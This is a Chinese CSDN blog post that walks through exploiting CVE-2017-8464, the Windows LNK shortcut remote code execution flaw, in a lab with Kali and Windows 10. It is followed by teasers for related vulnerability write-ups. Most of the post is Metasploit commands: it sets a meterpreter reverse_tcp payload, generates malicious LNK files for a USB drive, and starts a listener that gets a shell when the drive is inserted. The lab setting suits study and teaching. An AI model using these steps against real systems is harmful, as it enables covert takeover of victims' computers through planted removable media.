震网三代cve_2017_8464漏洞复现

最新推荐文章于 2024-09-20 17:54:48 发布
最新推荐文章于 2024-09-20 17:54:48 发布
阅读量1.4k 收藏 4
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K17010/article/details/79826591
版权

影响版本:

 

windows 10

windwos RT 8.1

windows 8.1

windows 7

windows server 2016

windows server 2012 R2

windows server 2012

windows server 2008 R2

windows server 2008

 

以下文章中<   >里的内容为需要输入的代码,输入的代码也会用标记出来

 

攻击机:kali,ip:192.168.83.128

靶机:win10

准备工作:下载最新的zip包,下载完成后将压缩包内modules/exploits/windows/fileformat中的cve_2017_8464_lnk_rce.rb复制到目录/usr/share/metasploit-framework/modules/exploits/windows/fileformat下。


2.仅复制rb文件会出错,须再将压缩包内data/exploits中的cve-2017-8464文件夹复制到/usr/share/metasploit-framework/data/exploits中。

打开metaploit,msfconsole,

<msfconsole>

搜索cve_2017_8464<search cve_2017_8464>

 

 

使用exploit/windows/fileformat/cve_2017_8464_lnk_rce攻击模块

<use exploit/windows/fileformat/cve_2017_8464_lnk_rce>:

 

可以用<show options>查看设置是否成功

然后我们需要加载一个攻击模块,

<set payload windows/meterpreter/reverse_tcp>

中间可以用<ifconfig>查看攻击机的ip

设置攻击机的ip

<set lhost 192.168.83.128>

然后<exploit>运行(run应该也可以)会生成许多lnk文件

现在我们要将这些lnk文件复制到U盘里,这些lnk文件会自动保存到root/.msf4/local/目录下,注意,mf4是隐藏文件

现在,回到kali,使用监听模块,

<use multi/handler>

回车,然后加载一个payload(这里不小心错输入成paylaod居然也成功了)

<set payload windows/meterpreter/reverse_tcp>(以上24个文件其实只需要2个,但是不确定靶机的U盘系统为E盘或是D盘等等,所以直接保留了D到Z共23个文件,例如:如果靶机系统U盘为E盘只需要保留FlashPlayer_E和FlashPlayerCPLApp.cpl就可以)

设置好攻击机的ip(这里我又用ifconfig查看了ip)

<set lhost 192.168.83.128>

然后运行

<exploit>

现在,将U盘插入靶机,如果设置自动播放,在攻击机中会反弹一个meterpreter,如果未设置,在靶机中打开下面标记文件也可以

 

<shell>

拿到shell

 

陈晨0
关注
专栏目录
震网三代漏洞复现CVE-2017-8464
1匹黑马
02-22 1435
文章目录影响版本危害漏洞原理漏洞复现任务环境创建EXP获取靶机权限利用Powershell获取权限修复建议 影响版本 Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 Windows Server 2008 Windows Server 2008 R2 Windows Server 2012 Windows Server 2012 R2 ...
CVE-2017-8570漏洞复现与研究
空旷在远方
09-22 3336
CVE-2017-8570漏洞复现与研究 ——2018.7.2   目  录 1引言     1.1微软office漏洞背景 1.2 CVE-2017-8570简介 1.3 office适用版本 2原理简单分析 2.1漏洞原理简单分析 2.2漏洞原理简单图解 2.3相关知识介绍 2.3.1 ppsx介绍 2.3.2 exp介绍 3利用复现过程 3.1环境搭建 3.1...
漏洞预警】CVE-2017-8464 震网三代漏洞复现
weixin_30613343的博客
08-06 274
早在6月13日,微软发布补丁修复编号为CVE-2017-8464漏洞,本地用户或远程攻击者可以利用该漏洞生成特制的快捷方式,并通过可移动设备或者远程共享的方式导致远程代码执行,追溯到以前,NSA就承认利用过相似漏洞且以“Olympic Game”为代号研发震网病毒,来阻止伊朗发展核武。 受影响版本 Windows 7 Windows 8.1 Windows RT 8.1...
Tomcat CVE-2017-12615漏洞复现
最新发布
2401_82451607的博客
09-20 719
Tomcat CVE-2017-12615漏洞复现
CVE-2017-8464远程命令执行漏洞震网漏洞复现
kuiguowei的博客
01-16 1908
2017年6月13日,微软官方发布编号为CVE-2017-8464漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。 漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何
Tomcat PUT方法任意写文件漏洞CVE-2017-12615)
a1b2c3是弱口令
08-27 1386
1.漏洞简介 当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。 影响范围: Apache Tomcat 7.0.0 - 7.0...
"震网三代" CVE-2017-8464 关于Powershell 漏洞复现
m622399的博客
04-11 1954
漏洞原理:          Windows系统通过解析 .LNK 后缀文件时,是使用二进制来解析的,而当恶意的二进制代码被系统识别执行的时候就可以实现远程代码执行,由于是在explorer.exe进程中运行的,所以load进内存的时候与当前用户具有相同的权限。          于是攻击者利用这一解析过程的漏洞,将包含恶意二进制的代码被附带进可移动驱动器(或远程共享过程中),受害者使用power...
CVE2017-8464震网三代漏洞分析
qq_42365249的博客
08-25 325
CVE2017-8464震网三代漏洞分析(转) 转载 本文由Kilig原创发布 转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/214846 安全客 - 有思想的安全新媒体
CVE-2017-8464 震网三代复现U盘利用
weixin_52777165的博客
01-16 608
一.影响版本 漏洞影响范围: Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 服务器系统: Windows Server 2008 Windows Server 2008 R2 Windows Server 2012 Windows Server 2012 R2 Windows Server 2016 二.漏洞复现 攻击机:kali2019.4 IP:192.168.1.12 靶机:win10 IP:192.168.1.3 打开kali终端进入msfcon
CVE-2017-8464复现(震网三代)
小赵同学的博客
01-17 498
CVE-2017-8464复现(震网三代) 影响版本 windows 10 windwos RT 8.1 windows 8.1 windows 7 windows server 2016 windows server 2012 R2 windows server 2012 windows server 2008 R2 windows server 2008 1. 漏洞利用与复现 环境: 攻击机kali:192.168.228.128 靶机window10 192.168.228.129 Kali终端输入
Log4j远程代码执行漏洞复现尝试
weixin_51194266的博客
06-29 652
log4j漏洞的简单复现
CVE-2017-8464漏洞复现
我的学习笔记
02-28 1158
感谢学长分享复现的技术文档,十分感谢。在线免费实验:http://www.hetianlab.com/expc.do?ec=ECIDee9320adea6e0620170831142939000011、资源:http://www.phpstudy.net/a.php/211.html2、本次测试使用了win10和kali最新版。下载安装phpstudy到...
CVE-2017-8464复现
qq_41772873的博客
03-02 1142
前言 CVE-2017-8464又称远程快捷方式漏洞 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 注释:.LNK是用于指向其他文件的一种文件,这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用...
[Shell]CVE-2017-8464漏洞复现
baguangman5501的博客
09-01 345
0x01 漏洞原理 Windows系统通过解析 .LNK 后缀文件时,是使用二进制来解析的,而当恶意的二进制代码被系统识别执行的时候就可以实现远程代码执行,由于是在explorer.exe进程中运行的,所以load进内存的时候与当前用户具有相同的权限。 于是攻击者利用这一解析过程的漏洞,将包含恶意二进制的代码被附带进可移动驱动器(或远程共享过程中),受害者使用powershell解析 ....
CVE-2017-8464(远程执行命令)漏洞复现
RongChun的博客
01-04 1093
漏洞复现: 利用原理: 创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒。 漏洞影响范围: • Microsoft Windows 10 Version 1607 for 32-bit Systems • Microsoft Windows 10 Version 1607 for x64-based Systems • Microsoft Windows 10 for 32-b...
windbg 命令_CVE20178464震网三代漏洞windbg动态调试
weixin_39845347的博客
12-12 466
漏洞历史2010年,攻击伊朗核工厂的漏洞利用工具就是“震网一代”,它因此被公认为世界上首个网络“超级破坏性武器”。2011年,“震网二代”蠕虫病毒出现,因为他会在临时目录下生成名为~DQ的随机文件,也被称作Duqu。2017年6月14日,微软在补丁中修补了一个快捷方式漏洞,也就是CVE-2017-8464漏洞,公告称此漏洞被国家背景的网络攻击所使用。该漏洞的原理同2010年美国和以色列入...
winCVE-2017-8464漏洞复现
weixin_44664530的博客
04-27 266
影响版本 windows 10 windwos RT 8.1 windows 8.1 windows 7 windows server 2016 windows server 2012 R2 windows server 2012 windows server 2008 R2 windows server 2008 复现下载工具https://github.com/rapid7/metaspl...
CVE-2017-8464震网3.0漏洞分析与复现
weixin_45484297的博客
03-29 2282
概述:微软在2017年6月份的补丁中修补了一个快捷方式(CVE-2107-8464)的漏洞,公告称此漏洞被国家背景的网络攻击所使用来实施攻击,该漏洞也被称为震网三代,随后Metasploit上发布了该漏洞的PoC。官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。本次实验主要分为漏洞复现和poc原理分析两部分,通过实验理清该漏洞可能的的攻击途径以及如何防护。 1.漏洞介绍 该漏洞的原理同2010年美国和以色列入
MSF之CVE-2017-8464远程命令执行漏洞复现
极光时流
12-02 3315
MSF之CVE-2017-8464远程命令执行漏洞复现准备扫描漏洞 准备 实验准备环境: 被攻击机:虚拟机win2008x64位系统,其IP为:192.168.1.107 攻击机:虚拟机kali系统,其IP为:192.168.1.111 攻击工具:kali自带的msfconsole工具 扫描漏洞kali终端中输入msfconsole cd 下载/ msfvenom -p windows...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值